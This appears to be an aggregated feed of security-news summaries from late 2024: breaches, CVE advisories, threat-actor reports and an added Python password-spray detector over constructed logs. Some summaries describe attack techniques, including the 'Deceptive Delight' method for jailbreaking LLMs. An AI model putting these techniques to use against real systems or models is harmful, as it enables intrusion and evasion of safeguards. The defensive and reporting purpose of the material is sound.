Posted by the Big Sleep team Introduction In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind. Today, we're excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found...
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html

Stalker Online - 1,385,472 breached accounts
In May 2020, over 1.3M records from the MMO game Stalker Online were breached. The data included email and IP addresses, usernames and hashed passwords.
https://haveibeenpwned.com/PwnedWebsites#StalkerOnline

Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network
Since August 2023, Microsoft has observed intrusion activity targeting and successfully stealing credentials from multiple Microsoft customers that is enabled by highly evasive password spray attacks. Microsoft has linked the source of these password spray attacks to a network of compromised devices we track as CovertNetwork-1658, also known as xlogin and Quad7 (7777). Microsoft is […] The post Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/10/31/chinese-threat-actor-storm-0940-uses-credentials-from-password-spray-attacks-from-a-covert-network/
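What a password spray looks like in sign-in telemetry and how to catch one, as an added example (this is not Microsoft's detection logic, and the log lines are constructed). A spray tries one or two passwords against many accounts, so per-account lockout thresholds never fire; the signal is breadth rather than depth. When the attempts are spread across a botnet such as the covert network described above, grouping by source IP shows nothing suspicious, so the detector below groups by target tenant and looks for a short window in which many distinct accounts fail while no single account fails more than a couple of times. A brute-force burst against one account is deliberately left to per-account controls and is not flagged.

```python
"""Password spray detection over constructed sign-in logs.

Added example, not Microsoft's code. Fields: timestamp, tenant, user,
source IP, result. The contoso entries model a low-and-slow spray from many
sources; the fabrikam entries model single-account brute force for contrast.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LOG = """
2024-10-31T09:00:01Z contoso alice 203.0.113.10 FAIL
2024-10-31T09:00:07Z contoso bob 203.0.113.11 FAIL
2024-10-31T09:00:12Z contoso carol 203.0.113.12 FAIL
2024-10-31T09:00:19Z contoso dave 198.51.100.5 FAIL
2024-10-31T09:00:25Z contoso erin 198.51.100.6 FAIL
2024-10-31T09:00:31Z contoso frank 198.51.100.7 FAIL
2024-10-31T09:00:38Z contoso grace 192.0.2.9 FAIL
2024-10-31T09:00:44Z contoso heidi 192.0.2.10 FAIL
2024-10-31T09:00:50Z contoso ivan 192.0.2.11 SUCCESS
2024-10-31T09:05:00Z fabrikam zoe 203.0.113.99 FAIL
2024-10-31T09:05:30Z fabrikam zoe 203.0.113.99 FAIL
2024-10-31T09:06:00Z fabrikam zoe 203.0.113.99 FAIL
2024-10-31T09:06:30Z fabrikam zoe 203.0.113.99 FAIL
2024-10-31T09:07:00Z fabrikam zoe 203.0.113.99 FAIL
2024-10-31T09:07:30Z fabrikam zoe 203.0.113.99 FAIL
"""


def parse(log: str):
    """Yields (timestamp, tenant, user, ip, result) tuples."""
    for line in log.strip().splitlines():
        ts, tenant, user, ip, result = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), tenant, user, ip, result


def detect_spray(events, window=timedelta(minutes=10), min_accounts=5, max_per_account=2):
    """Sliding window per tenant over failed sign-ins. Flags the first window
    where at least `min_accounts` distinct accounts fail and no account fails
    more than `max_per_account` times. Quadratic in the worst case, which is
    fine for a demo; a production version keeps running per-user counters."""
    by_tenant = defaultdict(list)
    for ts, tenant, user, ip, result in events:
        if result == "FAIL":
            by_tenant[tenant].append((ts, user, ip))

    findings = []
    for tenant, fails in by_tenant.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            ips = set()
            for ts, user, ip in fails[start:end + 1]:
                per_user[user] += 1
                ips.add(ip)
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
                findings.append({
                    "tenant": tenant,
                    "accounts": len(per_user),
                    "source_ips": len(ips),
                    "window_start": fails[start][0].isoformat(),
                })
                break  # one finding per tenant is enough here
    return findings


def classify(log: str) -> dict:
    """Returns the set of sprayed tenants and the underlying findings."""
    findings = detect_spray(parse(log))
    return {"sprayed": {f["tenant"] for f in findings}, "findings": findings}
```

In the sample, contoso is flagged as soon as five distinct accounts have failed once each from five different addresses, while fabrikam is not, since all six failures hit one account. The follow-up alert that matters most is the SUCCESS for ivan that arrives inside the flagged window from a source with no prior history for that tenant: that is the credential the spray obtained, and it should trigger session revocation and a password reset rather than wait for the next report.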

Microsoft now a Leader in three major analyst reports for SIEM
Microsoft is positioned in the Leaders Category in the 2024 IDC MarketScape for worldwide SIEM for Enterprise, making it the third major analyst report in SIEM to name Microsoft as a Leader. The post Microsoft now a Leader in three major analyst reports for SIEM appeared first on Microsoft Security Blog.
https://techcommunity.microsoft.com/t5/security-compliance-and-identity/microsoft-now-a-leader-in-three-major-analyst-reports-for-siem/ba-p/4278853

7 cybersecurity trends and tips for small and medium businesses to stay protected
The challenges that small and midsize businesses (SMBs) face when it comes to security continue to increase as it becomes more difficult to keep up with sophisticated cyberthreats with limited resources or security expertise. Research conducted highlights the top seven SMB cybersecurity trends and steps that can be taken to stay protected. The post 7 cybersecurity trends and tips for small and medium businesses to stay protected appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/10/31/7-cybersecurity-trends-and-tips-for-small-and-medium-businesses-to-stay-protected/

Loose-lipped neural networks and lazy scammers
Scammers use large language models (LLMs) to create phishing pages and leave artifacts in texts and tags, like the phrase "As an AI language model...".
https://securelist.com/llm-phish-blunders/114367/

Lottie Player compromised in supply chain attack — all you need to know
Popular JavaScript library and npm package Lottie Player was compromised in a supply chain attack, with threat actors releasing three new versions of the component yesterday, all within a few hours. Intel from a leading web3 anti-scam platform suggests at least one user may have lost more than 3,000 (10 BTC) after falling victim to a phishing transaction associated with the attack. Understand what this threat means for your business and what you need to do.
https://www.sonatype.com/blog/lottie-player-compromised-in-supply-chain-attack-all-you-need-to-know

TNAFlix - 1,374,344 breached accounts
In June 2022, the adult website TNAFlix suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 1.4M records of email and IP addresses, usernames and plain text passwords.
https://haveibeenpwned.com/PwnedWebsites#TNAFlix

Who Should Own AI Risk at Your Organization?
Explore who is and should be accountable for AI risk within organizations and how to empower them to take this significant responsibility.
https://www.hackerone.com/ai/who-owns-ai-risk

The evolution of open source risk: Persistent challenges in software security
As organizations increasingly rely on open source software, associated security risks grow, demanding more robust and proactive risk management.
https://www.sonatype.com/blog/the-evolution-of-open-source-risk-persistent-challenges-in-software-security

Microsoft Ignite: Sessions and demos to improve your security strategy
Join us at Microsoft Ignite 2024 for sessions, keynotes, and networking aimed at giving you tools and strategies to put security first in your organization. The post Microsoft Ignite: Sessions and demos to improve your security strategy appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/10/30/microsoft-ignite-sessions-and-demos-to-improve-your-security-strategy/

Change Healthcare Breach Hits 100M Americans
Change Healthcare says it has notified approximately 100 million Americans that their personal, financial and healthcare records may have been stolen in a February 2024 ransomware attack that caused the largest ever known data breach of protected health information.
https://krebsonsecurity.com/2024/10/change-healthcare-breach-hits-100m-americans/

The Karma connection in Chrome Web Store
Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users' every move to some Amazon cloud server. But that wasn't all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don't appear to be malicious yet. While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than...
https://palant.info/2024/10/30/the-karma-connection-in-chrome-web-store/

Unmasking the SYS01 Infostealer Threat: Bitdefender Labs Tracks Global Malvertising Campaign Targeting Meta Business Pages
In a world run by advertising, businesses and organizations are not the only ones using this powerful tool. Cybercriminals have a knack for exploiting the engine that powers online platforms by corrupting the vast reach of advertising to distribute malware en masse. While legitimate businesses rely on ads to reach new audiences, hackers exploit these platforms to trick users into downloading harmful software. Malicious ads often seem to promote legitimate software, streaming services, or produc
https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages/

Jumpy Pisces Engages in Play Ransomware
A first-ever collaboration between DPRK-based Jumpy Pisces and Play ransomware signals a possible shift in tactics. The post Jumpy Pisces Engages in Play Ransomware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/

Normalyze to be purchased by Proofpoint

https://www.proofpoint.com/us/newsroom/news/normalyze-be-purchased-proofpoint

Products Of The Year 2024: The Finalists

https://www.proofpoint.com/us/newsroom/news/products-year-2024-finalists

VimeWorld - 3,118,964 breached accounts
In October 2018, the Russian Minecraft service VimeWorld suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 3.1M records of usernames, email and IP addresses and passwords stored as either MD5 or bcrypt hashes.
https://haveibeenpwned.com/PwnedWebsites#VimeWorld

Metabase Information Disclosure Vulnerability (CVE-2021-41277)
What is the attack? FortiGuard Labs observes widespread attack attempts targeting a three-year-old Metabase vulnerability (CVE-2021-41277) detected by more than 30,000 sensors. Successful exploitation could lead to information disclosure, including exposure of server files and environment variables to unauthorized users. The vulnerability occurs due to the use of user-supplied input without proper validation. Metabase is an open-source data analytics platform. According to their website it is used by over 60,000 companies, including Capital One, OpenAI, and more. FortiGuard Recon Threat Intelligence team tracked this vulnerability being targeted by a hacktivist group called GhostSec back in May 2024. What is the recommended Mitigation? This issue is fixed in a new maintenance release (0.40.5 and 1.40.5),...
https://fortiguard.fortinet.com/threat-signal-report/5563

PCI DSS Self-Assessment Questionnaires: Choosing the Right Type
If you process credit card payments, you need to prioritize security. One way to guarantee this safety is by complying with Payment Card Industry (PCI) Data Security Standards (DSS).
https://www.legitsecurity.com/blog/pci-dss-self-assessment-questionnaire

PCI DSS Compliance Levels and Requirements: A Complete Guide
If your business processes credit card transactions, it needs to meet the Payment Card Industry (PCI) Data Security Standards (DSS).
https://www.legitsecurity.com/blog/pci-dss-compliance-levels

What Is Secrets Management? Best Practices and Challenges
Modern apps require hundreds of secrets to function (API keys, cloud credentials, etc.). However, poor management of these secrets can expose sensitive information publicly or to malicious actors.
https://www.legitsecurity.com/blog/what-is-secrets-management

Cyber Resilience Audit (CRA) scheme launches for assured CAF-based audits
NCSC-assured CRA service now offering Cyber Assessment Framework based audits and more applications invited from potential service providers.
https://www.ncsc.gov.uk/blog-post/cra-scheme-launches

Risk reduction redefined: How compromise assessment helps strengthen cyberdefenses
Kaspersky experts analyze cyberdefense weak points, including patch management, policy violations and MSSP issues, and real-world cases where compromise assessment helped detect and mitigate incidents.
https://securelist.com/compromise-assessment-cases/114332/

July 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for July 2024 where I collected and analyzed 219 events. During July 2024...
https://www.hackmageddon.com/2024/10/29/july-2024-cyber-attacks-statistics/

The threat from commercial cyber proliferation
Report informing readers about the threat to UK industry and society from commercial cyber tools and services.
https://www.ncsc.gov.uk/report/commercial-cyber-proliferation-assessment

Cyber Essentials: are there any alternative standards?
Can an equivalent cyber security standard deliver the same outcomes as the NCSC's Cyber Essentials scheme?
https://www.ncsc.gov.uk/blog-post/cyber-essentials-are-there-any-alternative-standards

Lumma/Amadey: fake CAPTCHAs want to know if you're human
Malicious CAPTCHA distributed through ad networks delivers the Amadey Trojan or the Lumma stealer, which pilfers data from browsers, password managers, and crypto wallets.
https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/

Email, Email on the Wall, Who Sent You, After All?
During Business Email Compromise (BEC) engagements we often have to analyze the provenance of emails. According to the FBI's Internet Crime Report, BEC is one of the most financially damaging attacks, even surpassing ransomware in terms of losses. But how can we know all of this? Through email headers! This blog post tries to shed some light on the information contained within emails, what it means, and what can be done to prevent this type of attack.
https://blog.compass-security.com/2024/10/email-email-on-the-wall-who-sent-you-after-all/

Proofpoint Signs Definitive Agreement to Acquire Normalyze

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-signs-definitive-agreement-acquire-normalyze

Proofpoint Expands Data Security With Normalyze Acquisition

https://www.proofpoint.com/us/newsroom/news/proofpoint-expands-data-security-normalyze-acquisition

Veeam Backup and Replication Deserialization Vulnerability (CVE-2024-40711)
What is the Vulnerability? CVE-2024-40711 is a critical unauthenticated Remote Code Execution (RCE) vulnerability in Veeam Backup & Replication software. Threat actors could execute arbitrary code on a vulnerable system without authentication, which poses a significant risk to organizations using Veeam for backup and data protection. The vulnerability was added to the Known Exploited Vulnerabilities Catalog (KEV) on October 17, 2024, and is known to be used in ransomware campaigns. What is the recommended Mitigation? Veeam has released security patches addressing CVE-2024-40711, along with 5 other lower severity vulnerabilities in Veeam Backup & Replication. https://www.veeam.com/kb4649 What FortiGuard Coverage is available? FortiGuard recommends that users apply the patch provided by the vendor...
https://fortiguard.fortinet.com/threat-signal-report/5559

Staff Stories Spotlight Series: Cybersecurity Awareness Month 2024
This blog is part of a larger NIST series during the month of October for Cybersecurity Awareness Month, called 'Staff Stories Spotlight.' Throughout the month of October this year, Q&A style blogs will be published featuring some of our unique staff members who have interesting backgrounds, stories to tell, and projects in the world of cybersecurity. This year's Cybersecurity Awareness Month theme is 'Secure our World.' How does this theme resonate with you, as someone working in cybersecurity? For me, this year's theme is a reminder of the global nature of NIST's cybersecurity and privacy
https://www.nist.gov/blogs/cybersecurity-insights/staff-stories-spotlight-series-cybersecurity-awareness-month-2024-3

Cloud Security Essentials
Cloud security involves employing perimeter defenses like firewalls, IDPSs and VPNs as well as guaranteeing isolation through network segmentation and virtual LANs while monitoring traffic for anomalies and threats –... The post Cloud Security Essentials appeared first on Hacker Combat.
https://www.hackercombat.com/cloud-security/

Antivirus Software
Antivirus software protects devices against viruses, malware, and other cyberthreats by detecting, quarantining, and deleting malicious code. Modern antivirus products also offer additional security features such as password protection, identity... The post Antivirus Software appeared first on Hacker Combat.
https://www.hackercombat.com/antivirus-software/

Three Ways AI Can Hack the U.S. Election
The growing capability of AI content poses three very real threats to modern elections. We explain each, and take a glimpse at a possible solution to the growing AIpocalypse.
https://www.f5.com/labs/articles/cisotociso/three-ways-ai-can-hack-the-us-election

StreamCraft - 1,772,620 breached accounts
In July 2020, the Russian Minecraft service StreamCraft suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 1.8M records of usernames, email and IP addresses and passwords stored as either MD5 or bcrypt hashes.
https://haveibeenpwned.com/PwnedWebsites#StreamCraft

We're all getting too many political texts. It's not too late to fight back.

https://www.proofpoint.com/us/newsroom/news/were-all-getting-too-many-political-texts-its-not-too-late-fight-back

The Windows Registry Adventure #4: Hives and the registry layout
Posted by Mateusz Jurczyk, Google Project Zero To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry really works internally, things may get confusing really fast. What are hives? How do they map or relate to the top-level keys? Why are some HKEY root keys pointing inside of other root keys (e.g. HKCU being located under HKU)? These are all valid questions, but they are difficult to answer without fully understanding the interactions between the user-mode Registry API and the kernel-mode registry...
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html

How to Protect Against Ransomware Attacks?
Criminal hackers employ ransomware attacks against their targets by encrypting their data and demanding that a ransom be paid within an allotted timeframe or risk losing it forever. When an... The post How to Protect Against Ransomware Attacks? appeared first on Hacker Combat.
https://www.hackercombat.com/protect-against-ransomware-attacks/

Cybersecurity spotlight on bug bounty researcher @adrianoapj
As we wrap up Cybersecurity Awareness Month, the GitHub Bug Bounty team is excited to feature another spotlight on a talented security researcher who participates in the GitHub Security Bug Bounty Program—@adrianoapj! The post Cybersecurity spotlight on bug bounty researcher @adrianoapj appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/cybersecurity-spotlight-on-bug-bounty-researcher-adrianoapj/

16-31 July 2024 Cyber Attacks Timeline
In the second timeline of July 2024 I collected 116 events (7.25 events/day) with a threat landscape dominated by malware with...
https://www.hackmageddon.com/2024/10/24/16-31-july-2024-cyber-attacks-timeline/

AWS CDK Bucket Squatting Risk
The AWS Cloud Development Kit (CDK) is a way of deploying infrastructure-as-code. The vulnerability involves AWS CDK's use of a predictable S3 bucket name format (cdk-{Qualifier}-assets-{Account-ID}-{Region}), where the default “random” qualifier (hnb659fds) is common and easily guessed. If an AWS customer deletes this bucket and reuses CDK, an attacker who claims the bucket can inject malicious CloudFormation templates, potentially gaining admin access. Attackers supposedly only need the AWS account ID to prepare the bucket in various regions, exploiting the default naming convention. However, it is important to note that the additional conditions greatly lower the likelihood of exploitation. The victim must use the CDK, having deleted the bucket, and then subsequently attempt to...
https://www.cloudvulndb.org/aws-cdk-squatting

The Global Surveillance Free-for-All in Mobile Ad Data
Not long ago, the ability to remotely track someone's daily movements just by knowing their home address, employer, or place of worship was considered a powerful surveillance tool that should only be in the purview of nation states. But a new lawsuit in a likely constitutional battle over a New Jersey privacy law shows that anyone can now access this capability, thanks to a proliferation of commercial services that hoover up the digital exhaust emitted by widely-used mobile apps and websites.
https://krebsonsecurity.com/2024/10/the-global-surveillance-free-for-all-in-mobile-ad-data/

The Crypto Game of Lazarus APT: Investors vs. Zero-days
Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.
https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/

Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction
We examine an LLM jailbreaking technique called "Deceptive Delight," a technique that mixes harmful topics with benign ones to trick AIs, with a high success rate. The post Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction appeared first on Unit 42.
https://unit42.paloaltonetworks.com/jailbreak-llms-through-camouflage-distraction/

Missing authentication in fgfmsd
A missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests. Reports have shown this vulnerability to be exploited in the wild. Revised on 2024-11-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-423

5 new protections on Google Messages to help keep you safe
Posted by Jan Jedrzejowicz, Director of Product, Android and Business Communications; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse; Stephan Somogyi, Product Lead, User Protection; Branden Archer, Software Engineer. Every day, over a billion people use Google Messages to communicate. That's why we've made security a top priority, building in powerful on-device, AI-powered filters and advanced security that protects users from 2 billion suspicious messages a month. With end-to-end encrypted RCS conversations, you can communicate privately with other Google Messages RCS users. And we're not stopping there. We're committed to constantly developing new controls and features to make your conversations on Google Messages even more secure and private. As...
http://security.googleblog.com/2024/10/5-new-protections-on-google-messages.html

IoT Assignment Completed! Report on Barriers to U.S. IoT Adoption
The 16 members of the NIST-managed Internet of Things (IoT) Advisory Board have completed their report on barriers to the U.S. receiving the benefits of IoT adoption, along with their recommendations for overcoming those barriers. As Benson Chan (Chair) and Dan Caprio (Vice Chair) of the IoT Advisory Board state in the report: “The United States is in the early stages of a profound transformation, one that is driven by economic, societal, and cultural innovations brought about by the IoT. These innovations intertwine connectivity and digital innovation with the opportunity to drive a
https://www.nist.gov/blogs/cybersecurity-insights/iot-assignment-completed-report-barriers-us-iot-adoption

Most Political Campaign Texts Aren't Scams, Experts Say

https://www.proofpoint.com/us/newsroom/news/most-political-campaign-texts-arent-scams-experts-say

Google Chromium in Visuals Use-After-Free Vulnerability (CVE-2024-4671)
What is the Vulnerability? A new zero-day vulnerability has recently been discovered in the Visuals component of Chrome, which is responsible for rendering and displaying web content. This Visuals Use-After-Free Vulnerability, tagged as CVE-2024-4671, can cause a browser to crash, execute code, and leak data. According to Google, the vulnerability is being actively exploited, and CISA has already added this vulnerability to its Known Exploited Vulnerabilities catalog. What is the vendor mitigation? Google released security updates on May 9, 2024 for Windows, MacOS, and Linux affecting the Google Chrome browser. The vendor advises users to ensure that they are running the latest version of their browsers. Users of Chromium-based browsers such as Microsoft Edge and Opera are also advised to apply the fixes...
https://fortiguard.fortinet.com/threat-signal-report/5437

VMware ESXi Ransomware Attack (CVE-2024-37085)
What is the Attack? Threat actors are exploiting an authentication bypass vulnerability in ESXi hypervisors, known as CVE-2024-37085, to gain full administrative permissions on domain-joined ESXi hypervisors. This flaw allows threat actors to encrypt critical ESXi servers in ransomware attacks. On Monday, July 29, Microsoft published a threat intelligence blog on observed exploitation of CVE-2024-37085. According to the blog, Akira and Black Basta ransomware deployments were found on the impacted servers. The vulnerability was also added to CISA's Known Exploited Vulnerabilities (KEV) catalog on July 31, 2024. What is the recommended Mitigation? Please go through the vendor provided update to address the security vulnerability. Support Content Notification - Support Portal - Broadcom support portal. What...
https://fortiguard.fortinet.com/threat-signal-report/5498

NextGen Healthcare Mirth Connect RCE (CVE-2023-43208, CVE-2023-37679)
What is the vulnerability? NextGen Healthcare Mirth Connect is vulnerable to unauthenticated remote code execution (CVE-2023-43208) caused by an incomplete patch of a Command Injection flaw (CVE-2023-37679). Mirth Connect is an open-source data integration platform widely used by healthcare companies. It enables the management of information using bi-directional sending of many types of messages. Attackers could exploit this vulnerability for initial access or to compromise sensitive healthcare data. CISA recently added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog on May 20th, 2024. What is the recommended Mitigation? Users are advised to update to the latest version of NextGen Healthcare Mirth Connect as per the vendor's instructions. What FortiGuard Coverage...
https://fortiguard.fortinet.com/threat-signal-report/5460

Oracle WebLogic Server Vulnerabilities (CVE-2023-21839, CVE-2017-3506)
What is the attack? A threat actor known as Water Sigbin (aka the 8220 Gang) is seen exploiting two vulnerabilities in the Oracle WebLogic server: CVE-2017-3506, which allows remote OS command execution, and CVE-2023-21839, an insecure deserialization vulnerability. CISA added the Oracle WebLogic flaw tracked as CVE-2017-3506 to its Known Exploited Vulnerabilities catalog on 3 June 2023. What is the recommended Mitigation? Apply the most recent patch released by Oracle. In the advisory, Oracle mentioned that they continue to receive reports of exploitation attempts. What FortiGuard Coverage is available? FortiGuard customers remain protected by the IPS signatures available for both vulnerabilities. FortiGuard Outbreak Alert is available to review the full coverage. FortiGuard Incident...
https://fortiguard.fortinet.com/threat-signal-report/5466

CVE-2024-8901 - missing JWT issuer and signer validation in aws-alb-route-directive-adapter-for-istio
Publication Date: 2024/10/21 4:00 PM PDT The AWS ALB Route Directive Adapter For Istio repo provides an OIDC authentication mechanism that was integrated into the open source Kubeflow project. The adapter uses JWT for authentication, but lacks proper signer and issuer validation. In deployments of ALB that ignore security best practices, where ALB targets are directly exposed to internet traffic, an actor can provide a JWT signed by an untrusted entity in order to spoof OIDC-federated sessions and successfully bypass authentication. Affected versions: v1.0, v1.1 Resolution The repository/package has been deprecated, is End of Life, and is no longer actively supported. Workarounds As a security best practice, ensure that your ELB targets (e.g. EC2 Instances, Fargate...
https://aws.amazon.com/security/security-bulletins/AWS-2024-011/

CVE-2024-10125 - missing JWT issuer and signer validation in aws-alb-identity-aspnetcore
Publication Date: 2024/10/21 4:00 PM PDT Description: The Amazon.ApplicationLoadBalancer.Identity.AspNetCore repo contains Middleware that can be used in conjunction with the Application Load Balancer (ALB) OpenId Connect integration and can be used in any ASP.NET Core deployment scenario, including AWS Fargate, Amazon Elastic Kubernetes Service (Amazon EKS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Compute Cloud (Amazon EC2), and AWS Lambda. In the JWT handling code, it performs signature validation but fails to validate the JWT issuer and signer identity. The signer omission, if combined with a scenario where the infrastructure owner allows internet traffic to the ALB targets (not a recommended configuration), can allow for JWT signing by an untrusted entity...
https://aws.amazon.com/security/security-bulletins/AWS-2024-012/

Continued Intense Scanning From One IP in Lithuania
Plus a few interesting changes in the CVEs we track, and some notes on just what kinds of malware stagers we see.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-september-2024

Securing the open source supply chain: The essential role of CVEs
Vulnerability data has grown in volume and complexity over the past decade, but open source and programs like the Github Security Lab have helped supply chain security keep pace. The post Securing the open source supply chain: The essential role of CVEs appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/securing-the-open-source-supply-chain-the-essential-role-of-cves/

Missing JWT issuer and signer validation in ALB middleware

https://www.cloudvulndb.org/missing-jwt-issuer

Brazil Arrests 'USDoD,' Hacker in FBI Infragard Breach
Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being "USDoD," a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBI's InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population.
https://krebsonsecurity.com/2024/10/brazil-arrests-usdod-hacker-in-fbi-infragard-breach/

Publishers Spotlight: Proofpoint

https://www.proofpoint.com/us/newsroom/news/publishers-spotlight-proofpoint

Voice Cloning with Deep Learning Models
Given the explosion of development and interest in deep learning models in the past year, we decided to research the topic to increase our know-how and find applications where these technologies can be leveraged in offensive security engagements. This post explores the use of machine learning for voice cloning and how it can be used for social engineering.
https://blog.compass-security.com/2024/10/voice-cloning-with-deep-learning-models/

Abusing AD-DACL : Generic ALL Permissions
In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the Generic ALL permission in Active Directory environments. This permission provides The post Abusing AD-DACL : Generic ALL Permissions appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-generic-all-permissions/

Sudanese Brothers Arrested in 'AnonSudan' Takedown
The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. One of the brothers is facing life in prison for allegedly seeking to kill people with his attacks.
https://krebsonsecurity.com/2024/10/sudanese-brothers-arrested-in-anonsudan-takedown/

Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism
Explore how macOS Gatekeeper's security could be compromised by third-party apps not enforcing quarantine attributes effectively. The post Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism appeared first on Unit 42.
https://unit42.paloaltonetworks.com/gatekeeper-bypass-macos/

Safer with Google: Advancing Memory Safety
Posted by Alex Rebert, Security Foundations, and Chandler Carruth, Jen Engel, Andy Qin, Core Developers. Error-prone interactions between software and memory are widely understood to create safety issues in software. It is estimated that about 70% of severe vulnerabilities in memory-unsafe codebases are due to memory safety bugs. Malicious actors exploit these vulnerabilities and continue to create real-world harm. In 2023, Google's threat intelligence teams conducted an industry-wide study and observed a close to all-time high number of vulnerabilities exploited in the wild. Our internal analysis estimates that 75% of CVEs used in zero-day exploits are memory safety vulnerabilities. At Google, we have been mindful of these issues for over two decades, and are on a journey to continue...
http://security.googleblog.com/2024/10/safer-with-google-advancing-memory.html

Bringing new theft protection features to Android users around the world
Posted by Jianing Sandra Guo, Product Manager and Nataliya Stanetsky, Staff Program Manager, Android. Janine Roberta Ferreira was driving home from work in São Paulo when she stopped at a traffic light. A man suddenly appeared and broke the window of her unlocked car, grabbing her phone. She struggled with him for a moment before he wrestled the phone away and ran off. The incident left her deeply shaken. Not only was she saddened at the loss of precious data, like pictures of her nephew, but she also felt vulnerable knowing her banking information was on her phone that was just stolen by a thief. Situations like Janine's highlighted the need for a comprehensive solution to phone theft that exceeded existing tools on any platform. Phone theft is a widespread concern in many countries...
http://security.googleblog.com/2024/10/android-theft-protection.html

Guidance on effective communications in a cyber incident
Supporting organisations of all sizes to manage their communications strategy before, during and after a cyber security incident.
https://www.ncsc.gov.uk/guidance/effective-communications-in-a-cyber-incident

H1 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in the first half of 2024. In this period...
https://www.hackmageddon.com/2024/10/15/h1-2024-cyber-attacks-statistics/

Data exfil via VPC endpoint denials in CloudTrail
CloudTrail delivered events to the resource owner and API caller even when the API action was denied by the VPC endpoint policy. This could have enabled a stealthy data exfiltration method in cases where an attacker had previously compromised a VPC, by smuggling data through the user agent field in denied requests.
https://www.cloudvulndb.org/vpc-endpoint-log-data-exfil

'PDNS for Schools' to provide cyber resilience for more institutions
The NCSC's 'Protective Domain Name Service for Schools' scaled up to protect a wider range of organisations.
https://www.ncsc.gov.uk/blog-post/pdns-for-schools-provide-cyber-resilience-for-more-institutions

Cyber security tips for barristers, solicitors and legal professionals
Steps to take to help reduce the likelihood of falling victim to a cyber attack.
https://www.ncsc.gov.uk/guidance/cyber-security-tips-for-barristers-solicitors-and-legal-professionals

Using Chrome's accessibility APIs to find security bugs
Posted by Adrian Taylor, Security Engineer, Chrome. Chrome's user interface (UI) code is complex, and sometimes has bugs. Are those bugs security bugs? Specifically, if a user's clicks and actions result in memory corruption, is that something that an attacker can exploit to harm that user? Our security severity guidelines say "yes, sometimes." For example, an attacker could very likely convince a user to click an autofill prompt, but it will be much harder to convince the user to step through a whole flow of different dialogs. Even if these bugs aren't the most easily exploitable, it takes a great deal of time for our security shepherds to make these determinations. User interface bugs are often flaky (that is, not reliably reproducible). Also, even...
http://security.googleblog.com/2024/10/using-chromes-accessibility-apis-to.html

Protecting Your Website From DDoS Attack
Distributed denial-of-service attacks pose an increasing threat to organizations, with even some of the largest firms suffering significant disruptions from such attacks. Attackers use botnets of compromised IoT devices to...
https://www.hackercombat.com/ddos-attack/

Protect Your Devices With Free Virus Removal
